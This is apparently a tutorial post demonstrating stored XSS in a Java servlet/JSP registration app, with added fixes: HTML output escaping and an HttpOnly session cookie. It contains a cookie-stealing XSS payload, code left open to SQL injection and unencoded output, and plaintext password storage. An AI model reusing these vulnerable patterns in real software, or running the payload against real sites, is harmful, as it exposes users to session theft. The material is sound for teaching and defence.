I spent some time building a user-registration page and a show-users page, plus two HttpServlets.
Registration code:
<!-- method="post" so the request reaches the servlet's doPost below -->
<form action="register" method="post">
username:<input type="text" name="username"><br>
password:<input type="password" name="password"><br>
phone:<input type="text" name="phone"><br>
<input type="submit" value="register">
</form>
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
throws ServletException, IOException {
// User-controlled input is stored exactly as submitted, with no validation or encoding
String username = req.getParameter("username");
String password = req.getParameter("password");
String phone = req.getParameter("phone");
// String concatenation into SQL (DBUtil is the post's own helper); a PreparedStatement would avoid SQL injection here
String insertSQL = "insert into tb_user values ('" + username + "', '" + password + "', '" + phone + "')";
DBUtil.executeSQL(insertSQL);
}
Code for displaying users:
@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp)
throws ServletException, IOException {
String selectSQL = "select username, password, phone from tb_user";
Statement stmt = null;
ResultSet rs = null;
List<User> userList = new ArrayList<User>();
try {
stmt = DBUtil.createStatement();
rs = stmt.executeQuery(selectSQL);
// Each stored row, including the raw username, is loaded into a User object
while (rs.next()) {
User user = new User(rs.getString(1), rs.getString(2), rs.getString(3));
userList.add(user);
}
} catch (SQLException e) {
throw new ServletException(e);
} finally {
DBUtil.closeResultSet(rs);
DBUtil.closeStatement(stmt);
}
// Hand the list to the JSP, which renders the fields into the HTML body
req.setAttribute("user_list", userList);
req.getRequestDispatcher("showuser.jsp").forward(req, resp);
}
<body>
<%
List<User> userList = (List<User>) request.getAttribute("user_list");
for (int i = 0; i < userList.size(); i++) {
User user = userList.get(i);
%>
<div>
<%-- XSS sink: the stored username is written into the page without HTML encoding --%>
username:<%=user.getUsername() %><br>
phone:<%=user.getPhone() %><br>
</div>
<%
}
%>
</body>
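The defect in showuser.jsp is that `<%=user.getUsername() %>` writes stored data straight into the HTML body. The following is an added example, not code from the original post: a small output-encoding utility, with a `main` that runs it over a constructed ordinary name and over a username in the shape of the post's payload. Replacing the expression in the JSP with `<%=HtmlEscaper.escape(user.getUsername()) %>` makes the browser render the stored text as literal characters instead of parsing an `<a>` element with an `onclick` handler. The class name `HtmlEscaper` is an assumption.

```java
import java.util.List;

/**
 * Added example (not the original post's code): HTML-escape untrusted data
 * before it is written into an HTML body or a quoted attribute value.
 */
public final class HtmlEscaper {

    private HtmlEscaper() {}

    /** Escapes the five characters that can change HTML structure or close a quoted attribute. */
    public static String escape(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed sample values: an ordinary username and one shaped like the post's stored payload.
        List<String> usernames = List.of(
            "alice",
            "<a href=# onclick=\"document.location='index.jsp?c='+escape(document.cookie);\">Hacker</a>");
        for (String u : usernames) {
            System.out.println("raw:     " + u);
            System.out.println("escaped: " + escape(u));
        }
    }
}
```

In a JSP that already uses JSTL, `<c:out value="${user.username}"/>` performs the same encoding by default (its `escapeXml` attribute is `true` unless overridden), which avoids having to remember the escape call at every output point. Encoding must happen at output time, for the context being written into (HTML body here); storing the value unchanged in the database is fine.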
Then I registered one legitimate user and one malicious user. The malicious user's username was:
<a href=# οnclick=\"document.location=\'index.jsp?c=\'+escape\(document.cookie\)\;\">Hacker</a>
On the show-users page it renders as:
The user Hacker is shown as a link. Clicking it shows:
In the browser address bar the parameter is JSESSIONID%3D7B0C11B6826B67D3E4D9967837F2C48D, so the session id is 7B0C11B6826B67D3E4D9967837F2C48D.
This kind of XSS is persistent (stored) XSS.
How the session id was obtained:
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
session id:<%=session.getId()%><br>
<script type="text/javascript">
document.write(escape(document.cookie));
</script>
</body>
</html>
Output:
session id:9A7A5F89EBFC598FEC18FC003706A899
JSESSIONID%3D9A7A5F89EBFC598FEC18FC003706A899
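The script above can read JSESSIONID only because the container's session cookie is exposed to JavaScript through `document.cookie`. As an added example (not part of the original post), the listener below marks the session cookie HttpOnly and Secure at application startup using the Servlet 3.0 `SessionCookieConfig` API, which is a real API; the class name `SessionCookieHardening` is an assumption, and `setSecure(true)` assumes the application is served over HTTPS.

```java
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.annotation.WebListener;

/**
 * Added example (not the original post's code): harden the container-managed
 * session cookie so that script on the page cannot read it. Session cookie
 * settings must be changed before the context finishes initialising, which is
 * why this runs in contextInitialized.
 */
@WebListener
public class SessionCookieHardening implements ServletContextListener {

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        ServletContext ctx = sce.getServletContext();
        SessionCookieConfig cookie = ctx.getSessionCookieConfig();
        cookie.setHttpOnly(true);   // omitted from document.cookie; JESSIONID no longer appears in the output above
        cookie.setSecure(true);     // sent only over HTTPS (assumption: the app is served over TLS)
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) {
        // nothing to release
    }
}
```

The same two flags can be set declaratively in web.xml under `<session-config><cookie-config>` with `<http-only>true</http-only>` and `<secure>true</secure>`. This closes the cookie-read channel shown in the post but does not remove the stored XSS itself: injected script still runs in the victim's browser and can still send requests with the user's session, so HTML output encoding in showuser.jsp remains the actual fix, with HttpOnly as defence in depth.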